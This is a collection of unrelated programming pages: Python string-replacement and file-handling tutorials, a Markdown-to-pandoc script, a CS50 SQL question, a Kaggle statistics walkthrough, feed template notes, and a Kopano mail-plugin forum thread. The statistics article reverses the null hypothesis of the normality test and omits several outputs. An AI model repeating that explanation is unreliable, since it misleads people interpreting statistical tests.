Замена вхождения подстроки в строке Python
Замена всех или n вхождений подстроки в заданной строке - довольно распространенная проблема манипуляций со строками и обработки текста в целом. К счастью, большинство этих задач упрощается в Python благодаря огромному набору встроенных функций, включая эту.
Допустим, у нас есть строка, содержащая следующее предложение:
The brown-eyed man drives a brown car.
Наша цель - заменить слово "brown" на "blue":
The blue-eyed man drives a blue car.
В этой статье мы будем использовать функцию replace(), а также функции sub() и subn() с шаблонами для замены всех вхождений подстроки из строки.
replace()
Самый простой способ сделать это - использовать встроенную функцию - replace():
string.replace(oldStr, newStr, count)
Первые два параметра являются обязательными, а третий - необязательным. oldStr - это подстрока, которую мы хотим заменить на newStr. Стоит отметить, что функция возвращает новую строку с выполненным преобразованием, не затрагивая исходную.
Давайте попробуем:
string_a = "The brown-eyed man drives a brown car."
string_b = string_a.replace("brown", "blue")
print(string_a)
print(string_b)
Мы выполнили операцию над string_a, упаковали результат в string_b и распечатали их оба.
Этот код приводит к:
The brown-eyed man drives a brown car.
The blue-eyed man drives a blue car.
Опять же, строка в памяти, на которую указывает string_a, остается неизменной. Строки в Python неизменяемы, что просто означает, что вы не можете изменить строку. Однако вы можете повторно присвоить ссылочной переменной новое значение.
Чтобы, казалось бы, выполнить эту операцию на месте, мы можем просто переназначить string_a после операции:
string_a = string_a.replace("brown", "blue")
print(string_a)
Здесь новая строка, созданная методом replace(), присваивается переменной string_a.
Заменить n вхождений подстроки
А что, если мы не хотим изменять все вхождения подстроки? Что, если мы хотим заменить первые n?
Вот тут и появляется третий параметр функции replace(). Он представляет количество подстрок, которые будут заменены. Следующий код заменяет только первое вхождение слова "brown" на "blue":
string_a = "The brown-eyed man drives a brown car."
string_a = string_a.replace("brown", "blue", 1)
print(string_a)
И в консоли у нас будет:
The blue-eyed man drives a brown car.
По умолчанию третий параметр настроен на изменение всех вхождений.
Вхождения подстроки в регулярных выражениях
Чтобы еще больше обострить проблему, предположим, что мы хотим не только заменить все вхождения определенной подстроки, но и заменить все подстроки, соответствующие определенному шаблону. Даже это можно сделать с помощью однострочного кода, используя регулярные выражения и модуль стандартной библиотеки re.
Регулярные выражения - сложная тема с широким спектром использования в информатике, поэтому мы не будем вдаваться в подробности в этой статье.
По сути, регулярное выражение определяет шаблон. Например, предположим, что у нас есть текст о людях, владеющих кошками и собаками, и мы хотим заменить оба термина словом "pet". Во-первых, нам нужно определить шаблон, который соответствует обоим терминам, например - (cat|dog).
Использование функции sub()
Разобравшись с шаблоном, мы собираемся использовать функцию re.sub() со следующим синтаксисом:
re.sub(pattern, repl, string, count, flags)
Первый аргумент - это шаблон, который мы ищем (строка или объект Pattern), repl это то, что мы собираемся вставить (может быть строкой или функцией; если это строка, обрабатываются любые escape-символы в ней обратной косой чертой) и string это строка, в которой мы ищем.
Необязательными аргументами являются count и flags, которые указывают, сколько вхождений необходимо заменить, и флаги, используемые для обработки регулярного выражения, соответственно.
Если шаблон не соответствует ни одной подстроке, исходная строка будет возвращена без изменений:
import re
string_a = re.sub(r'(cat|dog)', 'pet', "Mark owns a dog and Mary owns a cat.")
print(string_a)
В консоле распечатается:
Mark owns a pet and Mary owns a pet.
Сопоставление с шаблоном без учета регистра
Например, чтобы выполнить сопоставление с шаблоном без учета регистра, мы установим для параметра flag значение re.IGNORECASE:
import re
string_a = re.sub(r'(cats|dogs)', "Pets", "DoGs are a man's best friend", flags=re.IGNORECASE)
print(string_a)
Теперь любая комбинация регистра "dogs" также будет включена. При сопоставлении шаблона с несколькими строками, чтобы избежать его копирования в нескольких местах, мы можем определить объект Pattern. У них также есть функция sub() с синтаксисом:
Pattern.sub(repl, string, count)
Использование объектов шаблона
Давайте определим Pattern для кошек и собак и проверим пару предложений:
import re
pattern = re.compile(r'(Cats|Dogs)')
string_a = pattern.sub("Pets", "Dogs are a man's best friend.")
string_b = pattern.sub("Animals", "Cats enjoy sleeping.")
print(string_a)
print(string_b)
Что дает нам результат:
Pets are a man's best friend.Animals enjoy sleeping.
Функция subn()
Также есть метод subn() с синтаксисом:
re.subn(pattern, repl, string, count, flags)
Функция subn() возвращает кортеж со строкой и числом совпадений в строке поиска:
import re
string_a = re.subn(r'(cats|dogs)', 'Pets', "DoGs are a mans best friend", flags=re.IGNORECASE)
print(string_a)
Кортеж выглядит так:
('Pets are a mans best friend', 1)
Объект Pattern содержит аналогичную функцию subn():
Pattern.subn(repl, string, count)
И он используется очень похожим образом:
import re
pattern = re.compile(r'(Cats|Dogs)')
string_a = pattern.subn("Pets", "Dogs are a man's best friend.")
string_b = pattern.subn("Animals", "Cats enjoy sleeping.")
print(string_a)
print(string_b)
Это приводит к:
("Pets are a man's best friend.", 1)('Animals enjoy sleeping.', 1)
Вывод
Python предлагает простые функции для обработки строк. Самый простой способ заменить все вхождения данной подстроки в строке - использовать функцию replace().
При необходимости модуль re стандартной библиотеки предоставляет более разнообразный набор инструментов, который можно использовать для решения более узких задач, таких как поиск шаблонов и поиск без учета регистра.
|
blob: 10980a54c61de41cf3667f15b7ffe88399faa62a (
plain
)
#!/usr/bin/env python3
import argparse
import copy
import os
import re
import subprocess
import sys
import tempfile
import CommonMark_bkrs as CommonMark
import yaml
def format_keyword(line):
words = line.split(' ')
keyword = words[0]
return '*{}* '.format(keyword) + line[len(keyword):]
def indent(line):
prefix = ' ' * 4
return '>{}{}'.format(prefix, line)
def format_match(keyword, line, m):
n = len(m.groups())
if n > 0:
end = 0
parts = []
for i in range(1, n+1):
parts.append(line[end:m.start(i)])
thispart = line[m.start(i) : m.end(i)]
parts.append('*{}*'.format(thispart))
end = m.end(i)
line = ''.join(parts) + line[m.end(n):]
line = '{} {}'.format(keyword, line)
return line
def format_backtick(c):
if c == "`":
return "`"
return c
def format_chars(s):
return ''.join(format_backtick(c) for c in s)
def format_scenario_step(bind, line, prev_keyword):
debug('line: %r' % line)
words = line.split()
if not words:
return line.strip(), prev_keyword
keyword = words[0]
real_keyword = keyword
if keyword.lower() == 'and':
if prev_keyword is None:
sys.exit('AND may not be used on first step in snippet')
real_keyword = prev_keyword
debug('keyword: %r' % keyword)
line = line[len(keyword):].lstrip()
debug('line: %r' % line)
for b in bind:
debug('consider binding %r' % b)
if real_keyword not in b:
debug('keyword %r not in binding' % real_keyword)
continue
m = re.match(b[real_keyword.lower()], line, re.I | re.M)
debug('m: %r' % m)
if m and m.end() == len(line):
debug('match: %r' % line)
debug(' : %r' % m.groupdict())
line = format_match(keyword, line, m)
break
else:
line = '{} {}'.format(keyword, line)
if not line.strip():
return line
line = format_chars(line)
debug('pre-indent: %r' % line)
lines = line.splitlines()
if len(lines) > 1:
line = '\n'.join([lines[0] + ' '] + [indent(x) + ' ' for x in lines[1:]])
debug('post-indent: %r' % line)
return format_keyword(line), real_keyword
def count_leading_whitespace(s):
n = 0
while s and s[0].isspace():
n += 1
s = s[1:]
return n
def skip_indent(s, indent):
while indent > 0 and s and s[0].isspace():
s = s[1:]
indent -= 1
return s
def get_steps(lines):
step = []
indent = None
for line in lines:
if not line.strip():
yield '\n'.join(step)
step = []
indent = None
elif line[0].isspace():
if indent is None:
indent = count_leading_whitespace(line)
line = skip_indent(line, indent)
step.append(line)
else:
yield '\n'.join(step)
step = [line]
indent = None
if step:
yield '\n'.join(step)
def format_fable_snippet(bind, lines):
# debug('snippet: %r' % lines)
prev_keyword = None
output = []
for step in get_steps(lines):
debug('step: %r' % step)
ln, prev_keyword = format_scenario_step(bind, step, prev_keyword)
output.append(ln)
return output
def is_fable_snippet(o):
prefix = "```fable\n"
return o.t == 'FencedCode' and o.info == 'fable'
def is_heading(o):
return o.t =='ATXHeader'
def write_document(bind, f, o):
pass
def write_atxheader(bind, f, o):
f.write('{} {}\n\n'.format('#' * o.level, ' '.join(o.strings)))
def write_setextheader(bind, f, o):
chars = {
1: '=',
2: '-',
}
c = chars[o.level]
f.write('{}\n{}\n\n'.format(' '.join(o.strings), c * 72))
def write_paragraph(bind, f, o):
for s in o.strings:
f.write('{}\n'.format(s))
f.write('\n')
def write_fable_snippet(bind, f, o):
for line in format_fable_snippet(bind, o.strings[1:]):
f.write('> {} \n'.format(line))
f.write('\n')
def write_not_fable_snippet(bind, f, o):
fence = o.fence_char * o.fence_length
lang = o.strings[0]
f.write('{}{}\n'.format(fence, lang))
for line in o.strings[1:]:
f.write('{}\n'.format(line))
f.write('{}\n'.format(fence))
f.write('\n')
def write_fencedcode(bind, f, o):
if is_fable_snippet(o):
write_fable_snippet(bind, f, o)
else:
write_not_fable_snippet(bind, f, o)
def write_indentedcode(bind, f, o):
for s in o.strings:
f.write(' {}\n'.format(s))
f.write('\n')
def write_horizontalrule(bind, f, o):
f.write('---\n')
def write_list(bind, f, o):
pass
def write_listitem(bind, f, o):
bullet = o.list_data['bullet_char']
offset = o.list_data['marker_offset']
padding = o.list_data['padding']
prefix = '{}{} '.format(' ' * offset, bullet)
cont = ' ' * padding
for c in o.children:
prepend = prefix
for s in c.strings:
f.write('{}{}\n'.format(prepend, s))
prepend = cont
if o.last_line_blank:
f.write('\n')
return True
def write_referencedef(bind, f, o):
for s in o.strings:
f.write('{}\n'.format(s))
writers = {
'Document': write_document,
'ATXHeader': write_atxheader,
'SetextHeader': write_setextheader,
'Paragraph': write_paragraph,
'FencedCode': write_fencedcode,
'IndentedCode': write_indentedcode,
'HorizontalRule': write_horizontalrule,
'List': write_list,
'ListItem': write_listitem,
'ReferenceDef': write_referencedef,
}
def write(bind, f, o):
if o.t not in writers:
debug('{} not known'.format(repr(o.t)))
return
writer = writers[o.t]
return writer(bind, f, o)
def walk(o, func):
done = func(o)
if not done:
for c in o.children:
walk(c, func)
def infer_basename(markdowns):
root, ext = os.path.splitext(markdowns[0])
if ext not in ['.md', '.mdwn']:
sys.exit('Input filenames must end in .md or .mdwn')
return root
# This only allows one markdown filename. This is crap. But I can't
# get it work with -- otherwise. What I want is for the following to
# work:
# ftt-docgetn --pdf foo.md bar.md -- --pandoc-arg --other-pandoc-arg
# but I can't make it work.
def parse_cli():
p = argparse.ArgumentParser()
p.add_argument('--pdf', action='store_true')
p.add_argument('--html', action='store_true')
p.add_argument('markdown', nargs=1)
args, pandoc_args = p.parse_known_args()
return args, pandoc_args
def debug(msg):
if False:
sys.stderr.write('DEBUG: {}\n'.format(msg))
sys.stderr.flush()
def pandoc(args):
argv = ['ftt-pandoc'] + args
subprocess.check_call(argv)
args, pandoc_args = parse_cli()
text = ''.join(open(filename).read() for filename in args.markdown)
basename = infer_basename(args.markdown)
dirname = os.path.dirname(basename)
with open(basename + '.yaml') as f:
bindings = yaml.safe_load(f)
start = '---\n'
end = '\n...\n'
if text.startswith(start):
meta, text = text.split(end, 1)
meta += end + '\n'
else:
meta = ''
parser = CommonMark.DocParser()
ast = parser.parse(text)
if args.pdf or args.html:
with tempfile.NamedTemporaryFile(mode='w', dir=dirname) as f:
f.write(meta)
walk(ast, lambda o: write(bindings, f, o))
f.flush()
if args.pdf:
pandoc(['-o', basename + '.pdf', f.name] + pandoc_args)
elif args.html:
pandoc(['-o', basename + '.html', f.name] + pandoc_args)
else:
sys.stdout.write(meta)
walk(ast, lambda o: write(bindings, sys.stdout, o))
|
I'm stuck on pset8 c$50 finance /buy: Form validation works properly but when i try to execute the INSERT INTO transactions table i get the following error:
RuntimeError: (sqlite3.OperationalError) near "'A'": syntax error
[SQL: INSERT INTO transactions (buyer, symbol, price, shares, total)
VALUES(8 'A' 72.16 1 72.16)]
my "transactions" table query is as follows:
CREATE TABLE 'transactions'
('id' integer PRIMARY KEY AUTOINCREMENT NOT NULL,
'buyer' integer NOT NULL,
'symbol' text NOT NULL,
'price' real NOT NULL,
'shares' INTEGER NOT NULL ,
'total' INTEGER NOT NULL ,
'transacted' datetime NOT NULL DEFAULT 'datetime(''now'')')
i'll add that i tried to implement the 'transacted' field in a various ways(with defaults or without etc..) even though it doesn't seem to be the problem
here's the current code i wrote:
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Form validation
if not request.form.get("symbol"):
return apology("Missing symbol")
elif not request.form.get("shares"):
return apology("Missing shares")
elif int(request.form.get("shares")) <= 0:
return apology("Invalid Shares")
elif not lookup(request.form.get("symbol")):
return apology("Invalid Symbol")
# Review user's cash
cash = db.execute("SELECT cash FROM users WHERE id= :id", \
id=session["user_id"])
# Ensure user can afford the transaction
stock = lookup(request.form.get("symbol"))
shares = int(request.form.get("shares"))
total = stock["price"] * shares
if cash[0]["cash"] < total:
return apology("Can't Afford")
# Confirm transaction, update user's balance
transaction = db.execute("INSERT INTO transactions (buyer, symbol, price, shares, total) VALUES(:buyer :symbol :price :shares :total)", \
buyer=session["user_id"], symbol=stock["symbol"], price=stock["price"], shares=shares, total=total)
cash = db.execute("UPDATE users SET cash = :cash WHERE id = :id", \
cash=cash - total, id=session["user_id"])
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("buy.html")
thanks in advance for your help!
|
Join the Patreonto get
Exclusive Downloads,
Direct Support,
Early Access,
Voting Access, our
Books for Free, and so much more!
Contents
Overview
This will be the fourth article in a four-part series covering the following:
Dataset analysis- We will present and discuss a dataset selected for our machine learning experiment. This will include some analysis and visualisations to give us a better understanding of what we're dealing with.
Experimental design- Before we conduct our experiment, we need to have a clear idea of what we're doing. It's important to know what we're looking for, how we're going to use our dataset, what algorithms we will be employing, and how we will determine whether the performance of our approach is successful.
Implementation- We will use the Keras API on top of TensorFlow to implement our experiment. All code will be in Python, and at the time of publishing everything is guaranteed to work within a Kaggle Notebook.
Results- Supported by figures and statistics, we will have a look at how our solution performed and discuss anything interesting about the results.
Results
In the last article we prepared our dataset such that it was ready to be fed into our neural network training and testing process. We then built and trained our neural network models using Python and Keras, followed by some simple automation to generate thirty samples per arm of our experiment. Now, we'll have a look at how our solutions performed and discuss anything interesting about the results. This will include some visualisation, and we may even return to our experiment code to produce some new results.
Let's remind ourselves of our testable hypothesis:
Hypothesis : A neural network classifier's performance on the Iris Flowerdataset is affected by the number of hidden layer neurons.
When we test our hypothesis, there are two possible outcomes:
$H_0$ the null hypothesis: insufficient evidence to support hypothesis.
$H_1$ the alternate hypothesis: evidence suggests the hypothesis is likely true.
Strictly speaking, our experiments will not allow us to decide on an outcome. Our experimental arm uses the same structure to the control arm except for one variable, and that is the number of neurons on the hidden layer changing from four to five. Therefore, we are only testing to see if this change affects the performance of the neural network classifier.
Loading the results
Similar to the last three parts of this series, we will be using a Kaggle Kernel notebook as our coding environment. If you have saved your files to a file using a Kaggle Notebook, then you will need to load the data file into your draft environment as a data source. It’s not immediately obvious where the files have been stored, but you can locate them by repeating the following steps:
Once you have the data in your environment, use the following code to load thedata into variables. You will need to adjust the parameters for read_csv()to match your filenames.
Note
Below you will see iris-flower-dataset-classifier-comparison used in the pathnames, be sure to use the correct pathnames for your own experiment.
results_control_accuracy = pd.read_csv("/kaggle/input/iris-flower-dataset-classifier-comparison/results_control_accuracy.csv")
results_experimental_accuracy = pd.read_csv("/kaggle/input/iris-flower-dataset-classifier-comparison/results_experimental_accuracy.csv")
If you don't have access to the results generated from the previous article, then you are welcome to use my results with the following code:
results_control_accuracy = pd.DataFrame([0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.6000000052981906, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9111111124356588])
results_experimental_accuracy = pd.DataFrame([0.9111111124356588, 0.9555555568801032, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.933333334657881, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9777777791023254, 0.9333333359824286, 0.9777777791023254, 0.9555555568801032, 0.9777777791023254, 0.9777777791023254])
Basic stats
With our results loaded, we can get some quick stats to start comparing the performance differences between the two arms of our experiment.
We can start by comparing the mean performance of the control arm against theexperimental arm. Using pandas and numpy , we can write the followingcode:
mean_control_accuracy = results_control_accuracy.mean()
print("Mean Control Accuracy: {}".format(mean_control_accuracy))
mean_experimental_accuracy = results_experimental_accuracy.mean()
print("Mean Experimental Accuracy: {}".format(mean_experimental_accuracy))
The output of which will be the following if you've used the data provided above:
At this point, it may be tempting to claim that the results generated by the experimental arm of our experiment has outperformed that of the control arm. Whilst it's true that the mean accuracy of the 30 samples from the experimental arm is higher than the control arm, we are not yet certain of the significance of these results. At this point, this difference in performance could have occurred simply by chance, and if we generate another set of 30 samples the results could be the other way around.
Before moving on, it may also be useful to report the standard deviation of the results in each arm of the experiment:
std_control_accuracy = results_control_accuracy.std()
print("Standard Deviation of Control Accuracy Results: {}".format(std_control_accuracy))
std_experimental_accuracy = results_experimental_accuracy.std()
print("Standard Deviation of Experimental Accuracy Results: {}".format(std_experimental_accuracy))
The output of which will be the following if you've used the data provided above:
Visualising the results
Moving onto visualisations, one common plot used to compare this type of datais the box plot, which we can produce using pandas.DataFrame.boxplot(). Before we do this, weneed to move the results from both arms of our experiment into a singleDataFrame and name the columns.
results_accuracy= pd.concat([results_control_accuracy, results_experimental_accuracy], axis=1)
results_accuracy.columns = ['Control', 'Experimental']
If we print out this new variable, we can see all our results are now in asingle DataFrame with appropriate column headings:
We can produce a box plot using a single line of code:
results_accuracy.boxplot()
The output of which will be the following if you've used the data provided above:
However, the scale of the plot has made it difficult to compare the two sets of data. We can see the problem with our own eyes, and it's down to one of the samples from the Control arm of the experiment. One of the samples appears to be around $0.60$ which is a clear outlier.
With pandas we can try two approaches to remove this outlier from view andget a better look. One is not to plot the outliers using the showfliersparameter for the box plot method:
results_accuracy.boxplot(showfliers=False)
Which will output:
Or to instead specify the y-axis limits for the box plot:
ax = results_accuracy.boxplot()
ax.set_ylim([0.9,1])
Which will output:
Distribution of the data
It may also be useful to find out if our results are normally distributed, as this will also help us decide what parametric or non-parametric tests to use. You may be able to make this decision using a histogram:
results_accuracy.hist(density=True)
Which will output the following:
But normally you will want to use a function that will test the data for you.One approach is to use scipy.stats.normaltest():
This function tests the null hypothesis that a sample comes from a normal distribution.
This function will return two variables, one called the statistic and mostimportantly for us, the p-value , which is the probability of the hypothesistest. A p-value , always between 0 and 1, indicates the strength of evidenceagainst the null hypothesis. A smaller p-value indicates greater evidenceagainst null hypothesis, whilst a larger p-value indicates weaker evidenceagainst the null hypothesis.
For this test, the null hypothesis is that the samples do not come from anormal distribution. Before using the test, we need to decide on a value foralpha , our significance level. This is essentially the “risk” of concludinga difference exists when it doesn’t, e.g., an alpha of $0.05$indicates a 5% risk. We can consider alpha to be some kind of threshold. Thiswill be covered in more detail in another article, but for now we will set$0.05$ as our alpha. This means if our p-value is less than$0.05$, the null hypothesis has been rejected and the samples are likelynot from a normal distribution. Otherwise, the null hypothesis cannot berejected, and the samples are likely from a normal distribution.
Let's write some code to determine this for us:
from scipy import stats
alpha = 0.05;
s, p = stats.normaltest(results_control_accuracy)
if p < alpha:
print('Control data is not normal')
else:
print('Control data is normal')
s, p = stats.normaltest(results_experimental_accuracy)
if p < alpha:
print('Experimental data is not normal')
else:
print('Experimental data is normal')
The output of which will be the following if you've used the data provided above:
Significance testing
Finally, let's test the significance of our pairwise comparison. Thesignificance test you select depends on the nature of your data-set and othercriteria, e.g. some select non-parametric tests if their data-sets are notnormally distributed. We will use the Wilcoxon signed-rank test through thefollowing function: scipy.stats.wilcoxon():
The Wilcoxon signed-rank test tests the null hypothesis that two related paired samples come from the same distribution. In particular, it tests whether the distribution of the differences x - y is symmetric about zero. It is a non-parametric version of the paired T-test.
https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.wilcoxon.html
This will give us some idea as to whether the results from the control arm aresignificantly different from those of the experimental arm. This will againreturn a p-value , and we will compare it with an alpha of $0.05$.
s, p = stats.wilcoxon(results_control_accuracy[0], results_experimental_accuracy[0])
if p < 0.05:
print('null hypothesis rejected, significant difference between the data-sets')
else:
print('null hypothesis accepted, no significant difference between the data-sets')
The output of which will be the following if you've used the data provided above:
This means that although the mean accuracy of our experimental arm samples outperforms the mean performance of our control arm, this is likely to be purely by chance. We cannot say that one is better than the other.
Conclusion
In the article we had a look at how our solutions performed and using some simple statistics and visualisations. We also tested whether our results came from a normal distribution, and whether results from both arms of our experiment were significantly different from each other. Through significance testing we determined that we were not able to claim that one arm of the experiment outperformed the other, despite the mean performances being different. Regardless, a result is a result, and we can extend our experiment to include a range of neurons per hidden layer instead of four compared five.
Thank you for following this four-part series on Machine Learning with Kaggle Notebooks. If you notice any mistakes or wish to make any contributions, please let me know either using the comments or by e-mail.
|
无视了文档的 status: false ,直接在 feed 中更新,大 BUG 啊!
官方文档 feed.jade 中是获取最近 10 篇文章:
feed_posts = posts.recent_10
要想排除某个分类,其实也就是 某个文件夹,只要在这里改动。经过超出预习的测试,暂且改为:
d.get_data(type='post+folder',status='public',excludes=['chat','photos','images','pages','_','template','configs'],limit=10,sort='desc')
其实文档里 get_data 有个 path 参数:
path 默认为
/(相当于站点根目录), 限定查询数据的路径,比如path='docs/', 则表示仅查询docs/这个目录下的数据。
可是我的各个分类文件夹直接在根目录,而这个 path 参数只能限定 1个 路劲,想多个这样写 path=['coding','reading'] 是无效的,逆行却爆出 bug 一堆……
完整代码如下,另存为 feed.jade 丢入主题 template 文件夹即可:
doctype xml
+set_content_type('application/xml')
feed(xmlns="http://www.w3.org/2005/Atom")
title= site.title
link(href="https://{{ request.host }}/")
link(ref="self", href="https://{{ request.host }}/feed")
id= site._id
feed_posts = d.get_data(type='post+folder', excludes=['chat','photos','images','pages','_','template','configs'],limit=10,sort='desc')
if feed_posts
updated= feed_posts[0]['date'].strftime('%Y-%m-%dT%H:%M:%SZ')
for post in feed_posts
entry
post_url = 'https://' + request.host + post.url.escaped
title= post.title.escaped
link(href=post_url, rel="alternate")
updated= post.date.strftime('%Y-%m-%dT%H:%M:%SZ')
id= post.url_path.escaped
author
name= site.configs.admin_name
summary(type="html")= post.content.escaped
|
0x00 文件的操作
文件读写
r读取;rb可以读取二进制文件(如图片、视频);w可覆盖写入;a+可追加写入
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
f = open("test.txt","r")
data = f.read()
print "File name: ",f.name
print "File open moudle: ",f.mode
print "File is close ?",f.closed
print "File content: ",data
finally:
f.close()
with open("test.txt","a+") as f: #自动调用close()
data = "\nYes,I know."
f.write(data)
print u"写入内容:%s" % data
with open("test.txt","r") as f:
#readlines()一次读取一行,返回一个列表,也可以用read(size)读取指定大小
line = f.readlines()
print line
指针移动
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
f = open("test.txt","r")
data = f.read(6) #读取6个字节,所以指针位置为6
print u"指针当前位置:",f.tell()
f.seek(4,0) #0表示从开头位置,向后移动4
print u"指针当前位置:",f.tell()
f.seek(-3,1) #1表示从当前位置,向前移动3
print u"指针当前位置:",f.tell()
f.seek(-10,2) #2表示从末尾位置,向前移动10
print u"指针当前位置:",f.tell()
finally:
f.close()
文件操作
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
if not os.path.exists("test.txt"):
f = open("test.txt","w") #新建文件
f.close()
print u"新建文件test.txt"
else:
os.rename("test.txt","temp.txt") #重命名
print u"文件test.txt重命名为temp.txt"
if os.path.exists("temp.txt"):
time.sleep(2)
os.remove("temp.txt") #删除文件
print u"删除文件temp.txt"
0x01 目录的操作
目录操作
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import time
if not os.path.exists("test"):
os.mkdir("test") #创建目录
print u"创建目录test"
if not os.path.exists("aa/bb/cc"):
os.makedirs("aa/bb/cc") #创建多级目录
print u"创建多级目录aa/bb/cc"
else:
print u"多级目录已经存在"
if os.path.exists("test"):
time.sleep(2)
os.rmdir("test") #删除空的目录,目录内不能有东西
print u"删除空目录test"
print u"当前工作路径:",os.getcwd() #得到当前工作路径
os.chdir("d:\Clone") #切换工作路径
print u"切换工作路径到d:\Clone"
print u"当前工作路径:",os.getcwd()
删除非空文件夹
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
def deldir(dirname):
if os.path.exists(dirname):
dlist = os.listdir(dirname)
if dlist:
# print dlist
for x in dlist:
subFile = os.path.join(dirname,x)
# print subFile
if os.path.isfile(subFile):
print "remove file %s" % subFile
os.remove(subFile)
if os.path.isdir(subFile):
deldir(subFile)
print "remove dir %s" % dirname
os.rmdir(dirname)
else:
print "the dir is not exists"
dirname = raw_input("Please input you want to delete the folder name: ")
deldir(dirname)
常用方法
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
print os.name #输出字符串指示正在使用的平台
print os.linesep #给出当前平台使用的行终止符,windows为"\r\n"
os.system("whoami") #执行系统命令
print os.getcwd() #函数得到当前工作目录
print os.path.abspath('D:\Clone') #获得绝对路径
print os.listdir('C:\\Users\\WYB_9\\Desktop\\a') #返回目录下所有文件和目录名
print "#########################"
print os.path.isfile('python.py')
print os.path.isdir('D:\Clone') #检验给出的路径是一个文件还是目录。
print os.path.exists('D:\Clone') #检验给出的路径(文件和文件夹均可)是否真的存在
print os.path.normpath('c:/windows\\system32\\') #规范path字符串格式
print "#########################"
print os.path.getsize('python.py') #获得文件大小,如果name是目录返回0L
print os.path.join('C:\windows', '1.txt') #连接目录与文件名或目录
print os.path.split('C:\windows\c.txt') #返回一个路径的目录名和文件名
print os.path.dirname('C:\windows\c.txt') #返回目录名
print os.path.basename('C:\windows\c.txt') #返回文件名
print os.path.splitext('1.txt') #分离文件名与拓展名
|
Wrong receiver address displayed
Hi,
Any suggestions?
Hi @h44z ,
yes it shows the original to in the header, since this is stored as received from the mta.
But that you donât see the alias in the WebApp has a reason as well. When a message is delivered by the dagent it will try to resolve all participants against the gab (and replace the individual recipient with a reference against the gab). This is done so that our clients can more easily look up free/busy and presence data.
The simple workaround if you donât want to have the user resolved against the gab, is to remove aliases from the gab.
Hi,
thanks for the reply. But I cant remove the kopanoAlias from the user, because the user also sends mails using the alias address. If I remove the alias, the user gets an error message that he is not allowed to send from the alias address.
It would be nice to have a setting to either display the user from the gab or the original To header field.
A short update:
I have written a simple plugin for Kopano Webapp that allows the user to see the âoriginalâ receiver address.
If the TO: header differs from the displayed receiver, the plugin will add a extra line to the email information.
For Example:Gesendet: Montag 3 April 2017 00:20 An: Max Muster <max.m@test.de> Original To: maxi.muster@gmail.com
The plugin can be found here: https://git.sprinternet.at/zarafa_webapp/origrcv
Even if I found a workaround using this plugin, a configurable option for Kopano Webapp would be a nice to have. @fbartels Where can I create a feature/bug request?
This is a problem for me too. For the moment Iâve included @h44z 's plugin to my installation as well but an option in dagent or webapp to disable this behaviour would be very much appreciated by me.
Pozzo-Balbilast edited by
Hi,
a Webapp plugin does not solve the problem. Emails synced via z-push still have wrong email, same goes for IMAP sync. Further the âsed -iâ of kopano-dagent also works on attached emails (sic!). See picture
See post https://forums.zarafa.com/showthread.php?13528-Zarafa-Kopano-replace-alias-emails-with-email-of-user&p=58359&viewfull=1#post58359 for full problem explanation.
Last but not least, to prove that it is a bug and not a feature, I have use of GAB disabled where possible (e.g. server.cfg: enable_gab = no). I use ldap plugin.
A kopano-dagent setting to disable this behaviour would be greatly appreciated.
Thanks
Yeah, I just noticed that the problem still appears on mobile/zpush. Iâm probably just going to patch this out of dagent myself, and put it behind a config option. I can submit a patch/pull request to the kopano source tree if you guys take code?
I can submit a patch/pull request to the kopano source tree if you guys take code?
Sure, patches are welcome! You can find the contributing information at https://stash.kopano.io/projects/KC/repos/kopanocore/browse/CONTRIBUTING.md and as long as you make this behavior optional and non-default I donât see a problem with it.
OK, Iâm working on a patch but itâs a little harder than I thought. It seems thereâs no
explicitpoint in the code where this happens. I was looking in ResolveUsers() but I donât think thatâs it.
hpvblast edited by hpvb
I actually ended up writing a DAgent plugin for this. This was way easier and a little easier for me to manage with regards to upgrades. Itâd be nice if there were srpms for the open source packages :)
This does only partially fix the problem though: From headers are still rewritten which is very confusing too :)
Maybe this shows what my/our problem is though. I donât know how much work itâd be to do this in DAgent directly.
import MAPI
import email
from email.utils import getaddresses
from MAPI.Util import *
from plugintemplates import *
class RewriteUsers(IMapiDAgentPlugin):
def __init__(self, logger):
IMapiDAgentPlugin.__init__(self, logger)
def PreDelivery(self, session, addrbook, store, folder, message):
headers = message.GetProps([PR_TRANSPORT_MESSAGE_HEADERS], 0)[0].Value
msg = email.message_from_string(headers)
to_addrs = getaddresses(msg.get_all('to', []))
cc_addrs = getaddresses(msg.get_all('cc', []))
names = []
for addr in to_addrs:
names.append([
SPropValue(PR_RECIPIENT_TYPE, MAPI_TO),
SPropValue(PR_DISPLAY_NAME_W, unicode(addr[0])),
SPropValue(PR_ADDRTYPE, 'SMTP'),
SPropValue(PR_EMAIL_ADDRESS, unicode(addr[1])),
])
for addr in cc_addrs:
names.append([
SPropValue(PR_RECIPIENT_TYPE, MAPI_CC),
SPropValue(PR_DISPLAY_NAME_W, unicode(addr[0])),
SPropValue(PR_ADDRTYPE, 'SMTP'),
SPropValue(PR_EMAIL_ADDRESS, unicode(addr[1])),
])
message.ModifyRecipients(0, names)
return MP_CONTINUE,
